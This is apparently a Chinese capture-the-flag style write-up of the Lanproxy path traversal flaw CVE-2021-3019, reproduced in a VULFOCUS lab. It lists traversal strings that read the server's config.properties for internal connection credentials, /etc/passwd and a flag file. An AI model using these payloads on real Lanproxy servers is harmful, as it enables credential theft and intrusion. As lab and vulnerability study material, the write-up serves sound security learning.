[文件读取]lanproxy 文件读取 (CVE-2021-3019)

1.1漏洞描述

|------|---------------|
| 漏洞编号 | CVE-2021-3019 |
| 漏洞类型 | 文件读取 |
| 漏洞等级 | ⭐ |
| 漏洞环境 | VULFOCUS |
| 攻击方式 | |

描述: Lanproxy 路径遍历漏洞通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

1.2漏洞等级

高危

1.3影响版本

Lanproxy

1.4漏洞复现

1.4.1.基础环境

|----|-----------|
| 靶场 | VULFOCUS |
| 工具 | BurpSuite |
| | |

1.4.2.前提

  • 网站后台地址:

  • 后台管理账密:

  • 后台登录地址 :

1.5深度利用

1.5.1漏洞点

/../conf/config.properties

查看内部网连接的凭据

查看/etc/passwd

../../../../../etc/passwd

查看tmp/flag

../../../../../tmp/flag

拿到flag

flag-{bmh909dda7b-bfc7-464d-97ee-0c81c36001b2}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级
  • 打补丁
  • 上设备
相关推荐
码刘的极客手记4 分钟前
VCAP4-DCA Beta 考试体验分享与 esxcli 自动化实战(第二、三部分)
网络·esxi·vmware·虚拟机
青岑CTF12 分钟前
攻防世界-Ics-05-胎教版wp
开发语言·安全·web安全·网络安全·php
朝风工作室1 小时前
开源一款轻量级跨网段 IPC 设备发现与网络配置工具
网络·开源
Qaz555666912 小时前
透明DNS选路实验
网络
haluhalu.2 小时前
Linux网络编程------网络基础
网络·网络协议
坐怀不乱杯魂2 小时前
Linux网络 - HTTP协议
网络·网络协议·http
vortex52 小时前
动态漏洞探测:带参 URL 收集与扫描流程优化
web安全·网络安全·渗透测试
合才科技3 小时前
【要闻周报】网络安全与数据合规 2-1
安全·web安全
ipooipoo11884 小时前
动态住宅IP的定义、核心优势与技术场景应用
网络·网络协议·tcp/ip
one____dream4 小时前
【网安】Reverse-非常规题目
linux·python·安全·网络安全·ctf